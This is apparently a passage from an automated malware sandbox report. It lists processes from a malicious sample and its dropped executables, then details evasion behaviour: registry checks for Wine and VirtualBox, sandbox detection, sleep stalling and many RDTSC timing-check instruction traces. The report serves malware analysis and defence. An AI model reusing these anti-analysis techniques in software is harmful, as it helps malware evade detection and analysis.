                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Stalling execution: Execution stalls by calling Sleep
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | System information queried: FirmwareTableInformation
                                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BAD312 second address: BAD31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BAD31A second address: BAD31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BAD31E second address: BAD322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D37404 second address: D3742C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1228D24AC8h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D266D7 second address: D26715 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F122870CBC6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F122870CBD6h 0x00000011 je 00007F122870CBE0h 0x00000017 jmp 00007F122870CBD4h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D39FB9 second address: D39FD0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1228D24AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D39FD0 second address: D39FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3A1DF second address: D3A207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 xor dword ptr [esp], 234BF1CFh 0x0000000d mov cx, 47D9h 0x00000011 lea ebx, dword ptr [ebp+12460E93h] 0x00000017 mov dx, 2738h 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jl 00007F1228D24AB6h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3A2C8 second address: D3A2DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3A2DB second address: D3A2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3A2E1 second address: D3A35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F122870CBD3h 0x0000000b pop esi 0x0000000c popad 0x0000000d nop 0x0000000e mov si, cx 0x00000011 and edx, dword ptr [ebp+122D3905h] 0x00000017 push 00000000h 0x00000019 mov esi, 0FB81FD7h 0x0000001e je 00007F122870CBC9h 0x00000024 call 00007F122870CBC9h 0x00000029 pushad 0x0000002a push ebx 0x0000002b jbe 00007F122870CBC6h 0x00000031 pop ebx 0x00000032 pushad 0x00000033 jmp 00007F122870CBCDh 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b popad 0x0000003c push eax 0x0000003d jp 00007F122870CBCEh 0x00000043 mov eax, dword ptr [esp+04h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F122870CBD0h 0x0000004e rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3A35F second address: D3A369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F1228D24AB6h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3A369 second address: D3A388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3A388 second address: D3A38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3A38F second address: D3A3AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F122870CBD8h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5AA2B second address: D5AA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1228D24AB6h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007F1228D24AC7h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5AA55 second address: D5AA7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edi 0x0000000c push ebx 0x0000000d jmp 00007F122870CBCBh 0x00000012 pop ebx 0x00000013 jo 00007F122870CBD2h 0x00000019 jg 00007F122870CBC6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58938 second address: D5893E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5893E second address: D5894F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F122870CBC6h 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5894F second address: D5895A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58AA7 second address: D58AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58C2E second address: D58C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1228D24AC8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58C4E second address: D58C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58D92 second address: D58D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58D9E second address: D58DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58DA2 second address: D58DA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58EF0 second address: D58F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBD0h 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58F08 second address: D58F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1228D24ABAh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F1228D24AB6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58F26 second address: D58F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58F2A second address: D58F32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58F32 second address: D58F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F122870CBC6h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D591D8 second address: D591DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D591DF second address: D591EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F122870CBC6h 0x0000000a jne 00007F122870CBC6h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D591EF second address: D591F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5951F second address: D59547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jno 00007F122870CBCEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F122870CBCFh 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D59547 second address: D59551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D59551 second address: D59557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A1D7 second address: D5A1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A1DF second address: D5A1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A34B second address: D5A351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A351 second address: D5A355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A355 second address: D5A367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F1228D24ABCh 0x0000000c jnp 00007F1228D24AB6h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A367 second address: D5A36D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A4B4 second address: D5A4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A4BA second address: D5A4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A618 second address: D5A61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A61C second address: D5A629 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F122870CBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A629 second address: D5A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F1228D24AB6h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A638 second address: D5A63C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A63C second address: D5A642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A8DD second address: D5A8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D613DF second address: D613E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D613E3 second address: D61411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jc 00007F122870CBF0h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F122870CBCCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61411 second address: D61415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61415 second address: D61421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61421 second address: D61425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A938 second address: D1A93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63F0C second address: D63F28 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F1228D24ABCh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6445A second address: D64462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D645D8 second address: D645E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1228D24AB6h 0x0000000a pop ecx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D645E3 second address: D645EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F122870CBC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66528 second address: D6652C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6652C second address: D66532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66532 second address: D66538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66853 second address: D66869 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D669FA second address: D66A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1228D24AB6h 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66A05 second address: D66A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66B89 second address: D66B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67522 second address: D67547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jmp 00007F122870CBD7h 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F122870CBC6h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D675C0 second address: D675C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D675C4 second address: D675CE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F122870CBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D675CE second address: D675D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D675D4 second address: D675D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D675D8 second address: D67633 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007F1228D24AC8h 0x00000013 jmp 00007F1228D24ABDh 0x00000018 pop edi 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d jmp 00007F1228D24AC2h 0x00000022 pop ecx 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67AEA second address: D67AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67AEE second address: D67AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67BB6 second address: D67BBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D695B9 second address: D69655 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1228D24ABCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push edx 0x0000000d jne 00007F1228D24AB6h 0x00000013 pop edx 0x00000014 pop esi 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F1228D24AB8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 xor dword ptr [ebp+122D2122h], eax 0x00000036 push 00000000h 0x00000038 mov esi, 20C90F29h 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F1228D24AB8h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Bh 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 movzx esi, cx 0x0000005c xchg eax, ebx 0x0000005d jl 00007F1228D24ACFh 0x00000063 jmp 00007F1228D24AC9h 0x00000068 push eax 0x00000069 jl 00007F1228D24AD5h 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69655 second address: D69659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A09F second address: D6A0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AB7D second address: D6AB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A8C5 second address: D6A8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AB83 second address: D6AB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A8C9 second address: D6A8CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
